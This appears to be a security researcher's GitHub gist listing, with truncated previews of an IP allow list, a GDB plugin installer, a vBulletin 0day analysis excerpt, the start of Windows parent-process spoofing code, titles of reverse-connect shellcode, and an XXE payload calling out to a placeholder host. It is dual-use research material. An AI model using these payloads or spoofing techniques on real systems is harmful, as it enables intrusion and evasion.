Octo Leap JohnTroony

🐙

multitasking

Offensive and Defensive Security.

JohnTroony / Apache-.htaccess-allow

Last active July 27, 2023 04:06

	# Generated by https://www.countryipblocks.net/acl.php
	# Enable and Set Up the .htaccess File on Apache -
	# https://www.linode.com/docs/guides/how-to-set-up-htaccess-on-apache/
	allow from 5.10.100.136/29
	allow from 5.153.49.176/29
	allow from 37.58.111.112/29
	allow from 37.58.127.208/29
	allow from 41.57.96.0/20
	allow from 41.72.160.0/19
	allow from 41.75.144.0/20

JohnTroony / Troony_SQLi_Payloads.txt

Created November 8, 2021 06:21

A collection of SQLi payloads I've created for SQL injection hunting.

JohnTroony / fix_gef_on_gdb.sh

Created June 7, 2020 20:04

Install GEF-GDB Plugin with all commands working.

	#!/bin/bash

	#######################################################
	# Install GEF-GDB Plugin with all commands working #
	# John (Troon) Ombagi : @johntroony #
	#######################################################

	# Install unicorn, capstone (dependency package)
	sudo apt update && sudo apt install -y build-essential python3 python3-dev python3-pip gdb libcapstone3 libcapstone-dev cmake

JohnTroony / reverse_stager_shellcode.asm

Last active April 29, 2023 12:06

x86 Shellcoding: PoC code for connect back shellcode that fetch a second stage shellcode and executes it.

JohnTroony / reverse_staged_shellcode.c

Created November 25, 2019 17:59

Windows Shellcoding: PoC code for connect back shellcode that fetch a second stage shellcode and executes it.

JohnTroony / 2019_vbulletin_0day_info.txt

Created September 26, 2019 11:44 — forked from jamesbercegay/2019_vbulletin_0day_info.txt

	I have done some preliminary research into this bug and so far it does not seem like a backdoor. Just some really weird logic when handling routes, and rendering templates.

	As to why widgetConfig[code] executes via a POST request, it is because of the following code located in /includes/vb5/frontend/applicationlight.php


	$serverData = array_merge($_GET, $_POST);

	if (!empty($this->application['handler']) AND method_exists($this, $this->application['handler']))
	{
	$app = $this->application['handler'];

JohnTroony / perm_repeat.py

Last active September 27, 2019 12:12

Permutation of numbers with repeating.

	#!/usr/bin/python

	# John (Troon) Ombagi
	# [email protected]

	# PR(n, k) = n^k ----> Permutation with repetition.

	import itertools
	import sys

JohnTroony / terminator.config

Created August 9, 2019 08:54

custom config for terminator terminal on Kali Linux

	[global_config]
	enabled_plugins = TerminalShot, LaunchpadCodeURLHandler, APTURLHandler, LaunchpadBugURLHandler
	[keybindings]
	[profiles]
	[[default]]
	background_darkness = 0.83
	background_type = transparent
	cursor_color = "#aaaaaa"
	show_titlebar = False
	scrollback_infinite = True

JohnTroony / process_spoof.c

Created January 24, 2019 08:13

	/* x86-64-w64-mingw32-gcc process_spoof.c -o spoof.exe */
	/* spoof.exe explorer.exe calc.exe */
	#include <windows.h>
	#include <tlhelp32.h>

	#define PROC_THREAD_ATTRIBUTE_PARENT_PROCESS 0x00020000

	typedef struct _STARTUPINFOEX {
	STARTUPINFO StartupInfo;
	LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList;

JohnTroony / XXE_payloads

Created September 3, 2018 09:24 — forked from staaldraad/XXE_payloads

XXE Payloads

	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>